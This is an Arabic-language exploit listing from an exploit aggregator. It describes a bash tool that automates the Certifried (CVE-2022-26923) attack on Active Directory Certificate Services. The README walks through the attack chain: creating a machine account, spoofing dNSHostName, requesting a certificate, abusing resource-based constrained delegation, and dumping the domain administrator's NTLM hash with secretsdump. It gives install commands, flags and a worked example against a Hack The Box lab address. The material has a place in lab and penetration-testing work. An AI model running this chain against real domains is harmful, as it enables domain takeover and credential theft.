Sploitus

Exploit for CVE-2022-26923

kitploit · 2026-08-28

Exploit Code

MARKDOWN174 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ELIASDEKINIWEEK-CVE-2022-26923
# CVE-2022-26923 – استغلال Certifried (إساءة استخدام AD CS)

أتمتة استغلال **CVE-2022-26923 (Certifried)** مما يسمح برفع الامتيازات عبر إساءة استخدام خدمات شهادات Active Directory (AD CS) وتفويض مقيد قائم على الموارد (RBCD)، مما يؤدي إلى تفريغ تجزئة NTLM لحساب مسؤول نطاق.

> ⚠️ **للاستخدام التعليمي فقط / مختبر / HTB**
> 
> لا تستخدم في بيئة غير مصرح بها.

* * *

## 🎯 الوصف

يقوم هذا السكريبت بأتمتة سلسلة الهجوم التالية:

  1. إنشاء حساب جهاز تحت السيطرة
  2. تعديل `dNSHostName`
  3. طلب شهادة عبر AD CS
  4. المصادقة بالشهادة
  5. إساءة استخدام RBCD
  6. S4U2Self + S4U2Proxy
  7. استخراج تذكرة Kerberos لحساب `administrator`
  8. تفريغ NTLM عبر `secretsdump.py`



* * *

## 🔗 الثغرة

  * **CVE-2022-26923 – "Certifried"**
  * تؤثر في بيئات Active Directory التي تستخدم AD CS
  * تسمح بانتحال هوية وحدة تحكم النطاق عبر شهادة صدرت بشكل غير صحيح



* * *

## 🛠 الأدوات المستخدمة

  * `certipy-ad`
  * `bloodyAD`
  * `getST.py` (Impacket)
  * `secretsdump.py` (Impacket)
  * `openssl`



* * *

## 📦 تثبيت التبعيات

root@kitploit:~
    
    
    pipx install impacket
    pipx install certipy-ad
    pipx install bloodyad
    sudo apt install openssl
    

* * *

## 🚀 الاستخدام

root@kitploit:~
    
    
    chmod +x CVE-2022-26923.sh
    ./CVE-2022-26923.sh [خيارات]
    

### الخيارات المتاحة

root@kitploit:~
    
    
    -d, --dc-ip          عنوان IP لوحدة تحكم النطاق
    -D, --domain         اسم النطاق
    -u, --user           مستخدم صالح
    -p, --pass           كلمة مرور المستخدم
    -c, --comp-name      اسم الجهاز المسيطر عليه
    -C, --comp-pass      كلمة مرور الجهاز
    -a, --ca-name        اسم هيئة الشهادات
    -t, --template       قالب الشهادة
    -f, --pfx-file       اسم ملف PFX
    -H, --dc-hostname    اسم مضيف وحدة تحكم النطاق
    -A, --dc-account     حساب وحدة تحكم النطاق
    -i, --impersonate    الحساب الهدف للانتحال
    --verbose            وضع التصحيح
    -h, --help           المساعدة
    

* * *

## 🧠 مثال (HTB Certified)

root@kitploit:~
    
    
    ./CVE-2022-26923.sh \
    -d 10.129.1.39 \
    -D certifried.htb \
    -u some-email@example.com \
    -p 'Ch4ng3m3!' \
    --verbose
    

* * *

## 🔥 النتيجة المتوقعة

في نهاية التنفيذ:

  * تذكرة Kerberos `administrator.ccache`
  * تفريغ تجزئة NTLM لحساب `administrator`



في حالة وجود مشكلة مع Kerberos:

root@kitploit:~
    
    
    KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
    -just-dc-ntlm -just-dc-user administrator \
    certifried.htb/some-email@example.com \
    -k -no-pass -dc-ip 10.129.1.39
    

* * *

## 🧬 آلية العمل الداخلية

root@kitploit:~
    
    
    إنشاء حساب جهاز
            ↓
    تزوير dNSHostName
            ↓
    طلب شهادة (قالب الجهاز)
            ↓
    المصادقة عبر PFX
            ↓
    إساءة استخدام RBCD (bloodyAD)
            ↓
    S4U2Self + S4U2Proxy
            ↓
    استخراج تذكرة Kerberos
            ↓
    تفريغ NTLM عبر secretsdump
    

* * *

## ⚠️ إخلاء مسؤولية

تم تقديم هذا المشروع لأغراض:

  * تعليمية
  * بحث أمني
  * مختبر شخصي
  * CTF / HTB



يتخلى المؤلف عن أي مسؤولية في حالة الاستخدام غير المصرح به.

* * *

## 📜 الرخصة

MIT